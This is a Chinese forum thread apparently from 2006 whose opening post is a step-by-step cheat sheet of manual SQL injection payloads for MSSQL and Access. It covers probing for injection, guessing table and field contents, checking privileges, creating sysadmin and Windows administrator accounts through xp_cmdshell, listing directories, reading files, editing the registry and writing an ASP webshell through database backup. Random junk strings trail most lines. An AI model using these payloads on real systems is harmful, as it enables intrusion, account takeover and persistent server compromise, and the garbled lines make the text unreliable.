社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3950阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 \) dp  
  2.初步判断是否是mssql ;and user>0 :z8/iD y  
tCrEcjT-  
  3.注入参数是字符'and [查询条件] and ''=' 0Ye/  
0hoMf=bb$  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' {LiJ=Ebt  
1vo3aF  
  5.判断数据库系统 (n kg  
Tg^8a,Lt  
  ;and (select count(*) from sysobjects)>0 mssql 9\Gk)0  
eI ( S)q  
  ;and (select count(*) from msysobjects)>0 access T)e2IXGN  
fc~fjtqwvz  
D]E=0+  
H}r]j\  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 h> bjG  
&Z~_BT  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 d[?RL&hJO  
4vL\t uoz  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 2@MpWj4  
rS>.!DiYr,  
  9.(1)猜字段的ascii值(access) "1gIR^S%9  
s#5#WNzP  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ^!B]V>L-  
diNSF-wi,,  
  (2)猜字段的ascii值(mssql) V<WWtu;3  
p|gVIsg[-e  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 C1{Q 4(K%  
"S#$:92  
  10.测试权限结构(mssql) |vd|; " `  
\Yj_U'2"i  
cy@oAoBq  
)$p36dWl  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 3_@I E2dA  
?xwi2<zz  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- y" H5>  
.*N,x(V  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- N $>Ml!J  
ulALGzPh  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- J <z ^C  
VJ#ys _W  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ]A[}:E 5}  
M+")*Opq  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ozsd6&z5l  
r } Wdj  
  ;and 1=(select IS_MEMBER('db_owner'));-- cl`kd)"v  
NdJ]\>5oN,  
\ 3E%6L  
;LgMi5dN  
  11.添加mssql和系统的帐户 T ^eD  
yE N3/-S+  
  ;exec master.dbo.sp_addlogin username;-- ,sj(g/hg  
  ;exec master.dbo.sp_password null,username,password;-- c k[uvH   
)P R`irw  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 1?)h-aN  
%ly&~&0  
  ;exec master.dbo.xp_cmdshell 'net user username password bo/U5p  
rui 8x4c  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- BT(eU*m-  
:JBt qpo2  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- MA{ZmPm)  
[|$C2Dhw=  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- DPY+{5q2  
ug}u>vQ>  
IHW s<U  
[6K[P3UZx  
  12.(1)遍历目录 4NRj>y  
E @r &K  
  ;create table dirs(paths varchar(100), id int) !|9@f$Jv  
0xi2VN"X  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' xX%{i0E  
I RLAsb3  
  ;and (select top 1 paths from dirs)>0 @sa_/LH!K  
TyO]|Q5  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) iPCn-DoIS  
'xuxMav6m  
,V!Wo4M  
F+5 5p8  
  (2)遍历目录 d?5oJ'JU  
2 .Xx)(>  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ;|\j][A  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 PQi(Oc  
V,Bol(wY  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 a-#$T)mmfj  
bOYM-\ {y  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 dM}c-=w`  
u=PLjrB~}  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 L8E4|F}  
>`WQxkpy  
$2]>{g  
t0<RtIh9e  
  13.mssql中的存储过程 >t9DI  
4<<eqxI$|  
  xp_regenumvalues 注册表根键, 子键 Wf?[GO  
?W dY{;&  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 KWYjN h#*  
?;w`hA3ei  
  xp_regread 根键,子键,键值名 \u6.*w5TI  
q(46v`u  
  ;exec xp_regread  ^0{t  
Kl?C[  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 WOgkv(5KN  
A]%*ye"NT  
  xp_regwrite 根键,子键, 值名, 值类型, 值 PXl%"O%d  
1D1kjM^Bo  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ?]*"S{Cqv  
lt'N{LFvc  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 LGtw4'yr  
]w*`}  
  xp_regdeletevalue 根键,子键,值名 a_VWgPVdDS  
@G>e Cj  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 B)d 4]]4\\  
"Qc4v@~)  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 4K~>  
$BLd>gTzmv  
/&qE,>hd.+  
giIPK&  
  14.mssql的backup创建webshell wKpD++k  
@}r s6 G  
  use model Nw ,|4S  
p")"t`k7  
  create table cmd(str image); i6FJG\d  
/Aw@2 6  
  insert into cmd(str) values (''); =yRv *C  
U0W2  
  backup database model to disk='c:\l.asp'; S6JWsi4C:,  
# dUi['  
Q"!GdKM  
71IM`eL=ED  
  15.mssql内置函数 ^IvQdVB  
Yp3y%n  
  ;and (select @@version)>0 获得Windows的版本号 y(a>Y! dgU  
L[5U(`q[  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa sA+K?_  
Aj/EaIq  
  ;and (select user_name())>0 爆当前系统的连接用户 `Um-Y'KE  
?{L'd  
  ;and (select db_name())>0 得到当前连接的数据库 ))X"bFP!3  
A&ceuu  
PgP\v-.  
m.gv?  
  16.简洁的webshell 1'\s7P  
|g !$TUS.  
  use model >%N,F`^3  
=RM]/O9  
  create table cmd(str image); k5}Qx'/l  
]X X>h~0  
  insert into cmd(str) values (''); mtLiS3Nk8  
Hkf]=kPy*  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八